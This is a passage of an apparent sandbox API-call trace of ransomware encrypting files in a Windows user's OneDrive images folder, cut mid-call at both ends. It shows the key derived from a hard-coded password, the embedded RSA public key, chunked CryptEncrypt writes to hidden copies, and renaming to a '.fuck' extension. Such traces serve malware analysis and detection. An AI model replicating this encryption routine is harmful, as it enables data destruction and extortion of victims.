lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.417] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.418] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.418] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.418] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.418] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.418] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.418] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.418] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.419] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.420] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.420] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.420] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.420] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.420] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.420] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x75, lpOverlapped=0x0) returned 1 [0277.420] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x75, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x80) returned 1 [0277.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.420] CloseHandle (hObject=0x5d48) returned 1 [0277.420] CloseHandle (hObject=0x5d3c) returned 1 [0277.421] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg"), bFailIfExists=0) returned 1 [0277.424] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg", dwFileAttributes=0x0) returned 1 [0277.425] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg.gsg")) returned 1 [0277.426] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\done_graphic.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\done_graphic.svg.fuck")) returned 1 [0277.428] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.428] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.428] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.428] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.428] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.428] GetLastError () returned 0x0 [0277.428] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg")) returned 0x20 [0277.429] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg", dwFileAttributes=0x80) returned 1 [0277.430] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.431] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.432] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.433] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.435] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.435] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.435] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.435] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.435] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.435] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.435] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2ce90) returned 1 [0277.436] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ce90, dwCertEncodingType=0x1, pInfo=0x2f35de0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35e10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35e18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb988) returned 1 [0277.436] CryptEncrypt (in: hKey=0x2fb988, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.436] CryptEncrypt (in: hKey=0x2fb988, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2c7a8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2c7a8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.436] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2c7a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2c7a8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.437] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x31d, lpOverlapped=0x0) returned 1 [0277.458] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x31d, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x320) returned 1 [0277.458] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x320, lpOverlapped=0x0) returned 1 [0277.460] CloseHandle (hObject=0x5d3c) returned 1 [0277.460] CloseHandle (hObject=0x5d48) returned 1 [0277.460] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg"), bFailIfExists=0) returned 1 [0277.463] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg", dwFileAttributes=0x0) returned 1 [0277.464] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg.gsg")) returned 1 [0277.465] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\errorIcon.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\erroricon.svg.fuck")) returned 1 [0277.466] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0277.466] CryptDestroyKey (hKey=0x2fb688) returned 1 [0277.466] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0277.466] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0277.466] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0277.467] GetLastError () returned 0x0 [0277.467] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg")) returned 0x20 [0277.467] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg", dwFileAttributes=0x80) returned 1 [0277.467] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0277.468] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\folder.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0277.469] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\folder.svg.gsg", dwFileAttributes=0x2) returned 1 [0277.469] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0277.472] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0277.472] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0277.472] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0277.472] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0277.472] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0277.472] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0277.472] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2c038) returned 1 [0277.473] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2c038, dwCertEncodingType=0x1, pInfo=0x2f34990*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f349c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f349c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbe08) returned 1 [0277.473] CryptEncrypt (in: hKey=0x2fbe08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.473] CryptEncrypt (in: hKey=0x2fbe08, hHash=0x0, Final=1, dwFlags=0x0, 